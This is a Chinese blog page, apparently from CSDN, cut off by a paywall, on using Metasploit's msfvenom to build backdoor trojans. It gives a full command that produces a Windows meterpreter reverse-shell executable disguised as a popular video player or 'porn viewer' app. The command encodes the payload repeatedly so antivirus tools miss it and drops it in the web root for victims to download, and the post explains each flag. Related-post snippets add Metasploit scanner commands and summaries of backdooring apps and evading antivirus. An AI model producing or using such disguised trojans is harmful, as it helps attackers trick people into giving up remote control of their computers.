使用metasploit的msfvenom模块生成恶意软件获取后门

最新推荐文章于 2026-02-20 00:17:13 发布
原创 最新推荐文章于 2026-02-20 00:17:13 发布 · 2.1k 阅读 · 49
标签
#网络

一、背景

msfvenom是msfpayload、msfcencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。

二、各类实战

1.生成西瓜影音、看片神器后门木马

打开kali终端,msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.47.165 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/xigua1.exe

-a x86        架构为32位,兼容64位       

--platform        指定平台windows       

-p指定payload        指定LHOST,LPORT为本机IP、端口       

-b设定规避字符集(会影响payload质量)        "\x00"16进制的空字符       

-e指定需要使用的encoder(编码器)编码免杀       

 -i指定payload的编码次数,编码次数越多,免杀能力越强       

-f指定输出格式生成exe文件    &

最低0.47元/天 解锁文章
Time_worm
关注
网络安全】MSF常用的渗透技巧总结
Yb528970805的博客
09-27 1606
在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网,如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透。二、建立一条隧道连接至跳板机,将目标为私有地址的数据发发送至跳板机,目标为私有地址的数据包发送至公网地址会被哦公网路由抛弃,无法访问到目标。在 kaili 中配置隧道要使用的端口,现在版本的 msf 默认是用 socket5 协议,所以在 kali 中也使用 socket5,一、在跳板机上写路由,实现对其他网段的数据包进行转发。
Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面
m0_46161993的博客
07-01 6780
问题描述   分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。   由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。 解决办法 在msfconsole中使用命令: use exploit/windows/smb/ms08_06
Kali Linux渗透测试之Msfvenom木马生成与攻防实战
02-25
一、课程概要       本课程主要分享Kali Linux渗透测试之Msfvenom木马生成与攻防实战技巧!二、适合人员      1、零基础大学生      2、IT技术人员      3、服务器运维工程师      4、渗透测试工程师三、特别说明       1、本课程支持一次购买,享受永久观看!       2、本课程支持一次购买,享受永久更新!       3、本课程系讲师原创课程,如有盗用,欢迎举报!
MSF扫描开放的VNC空口令(虚拟网络计算机)
Ethan024的博客
06-24 1374
VNC用于解决某些问题,但是使用完后,管理员却忘了将其删除,从而留下了未打补丁的VNC。 载入MSF中的vnc模块,并查看选项: msf6 > use auxiliary/scanner/vnc/vnc_none_auth msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options 设置扫描地址段和线程数: msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 192.1
msfVNC身份识别
fake_hydra的博客
07-29 1752
use auxiliary/scanner/vnc/vnc_none_auth msf auxiliary(vnc_none_auth) > show options Module options (auxiliary/scanner/vnc/vnc_none_auth): Name Current Setting Required Descr
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
weixin_51803729的博客
02-11 7883
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
metasploitmsfvenom生成木马入侵电脑及手机
爱我非你莫属的博客
10-08 3902
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有–payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 9598
文章目录前言一、免杀1.msfvenom使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom使用 ┌──(root????kali)-[~] └─# msfvenom info
Msfvenom生成后门及运用
快吃小蛋糕吧的博客
10-01 5492
title: Msfvenom生成后门及运用 date: 2020-10-01 15:34:16 tags: [Metasploit,Backdoor] categories: 网络安全 Msfvenom生成后门及运用 本篇文章将会使用msfvenom来创建木马,然后通过msfconsole中的expoit/multi/handler来反弹靶机shell。 后门生成: 首先通过各种操作系统,脚本语言来生成后门: 常用参数说明: e 编码方式 i 编码次数 b 在生成的程序中避免出.
Metasploit 生成各种后门
LYSHARK
01-13 1万+
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
6-24漏洞利用-vnc密码破解
山兔的博客
08-01 5859
VNC(VirtualNetworkConsole)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的AT&T的欧洲研究实验室开发的。主要是用来可视化控制,类似于远程桌面,我们之前接触的ssh、rlogin都是命令行的控制终端,但是VNC跟远程桌面,又有一点不同,远程桌面,开放的是3389,而VNC服务端默认运行在5900端口5900端口,开放的一般是VNC服务端。...
附录一.msf常见案例
potato123232的博客
08-04 493
成功之后你就会获得用户名与密码(我用马赛克挡上了),获得了ssh我们就可以随便操作该机器的文件了,你可以使用putty。虽然PASS_FILE与USER_FILE显示的都不是必选参数,但是如果你不写就会报错,我动的是下面这三个参数。他们彼此可以ping通,从虚拟机ping到0网段的其他机器也可以ping通,但是到使用一些东西的时候就不行了。我把用户名与密码都放在两个文本文件的第一位了,我们直接看成功了之后我们可以怎么做。我们发现我们什么都没用扫描出来,但我们并非什么都没做,我们看一下服务端的日志。
MSF给正常程序添加后门
永远是少年
06-10 1874
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
菜鸟腾飞MSF
imtech的博客
01-16 968
菜鸟腾飞Metasploit Framework 渗透测试介绍
网络安全: Kali Linux 进行 MSFvenom 程序利用
cronaldo91的博客
03-06 2043
(6) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(1)Ubuntu创建计划任务crontab程序。(7)Kali Linux 连接后门。(2)Kali Linux 连接后门。(13)Ubuntu再次后台运行。(4)Ubuntu查看权限。(6)Ubuntu后台执行。(15)查看用户权限及进程。(1)查看DES 对称加密。(9)设置响应的IP地址。(4)设置响应的IP地址。(10)设置响应的端口。(5)设置响应的端口。
VNC安全攻防实战:从密码破解到防御加固
最新发布
weixin_29237635的博客
02-20 435
本文深入剖析了VNC远程桌面服务的安全风险与防御策略。从攻击者视角演示了如何通过端口扫描和密码破解等漏洞利用手段入侵配置不当的VNC服务,并提供了从强密码设置、网络隔离到SSH隧道加密和fail2ban防护等层层递进的实战加固方案,帮助管理员筑牢远程管理安全防线。
利用metasploit生成免杀后门
mirror97black的博客
01-26 5885
免杀 之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。 免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软 静态免杀 静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。 使
Metasploit渗透测试之制作隐藏后门(一)——使用永恒之蓝漏洞对win7进行渗透
qq_63831588的博客
06-24 1034
kali,永恒之蓝,漏洞利用,后门,远程连接,木马
1.1 Metasploit 工具简介
热门推荐
LYSHARK
06-30 1万+
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由`Rapid7`公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和`Payload`工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括`Windows、Linux、MacOS`等。直到今天`Metasploit`已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
对Android应用植入后门 实现msf控制(附带所需工具和常见坑解决办法)
weixin_72849553的博客
12-21 5798
本人刚入msf坑不久,对于Android的渗透比较感兴趣,于是在网上寻找了很久资料,但是发现很多实现方法都会出现各种奇怪报错,于是我花了点时间,在外面的世界找解决方案,总算实现成功,故整理文章,供正在困惑和迷茫中挣扎的小伙伴们互相交流。下面进入正题:我们的思路是对一个安卓应用注入msf生成的payload后门,并实现内网范围或是外网范围内的持续控制,这样就会实现后门随正常应用启动,但不易被发现。文中会提供一些思路拓展,如果需要,我可以再展开来讲。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值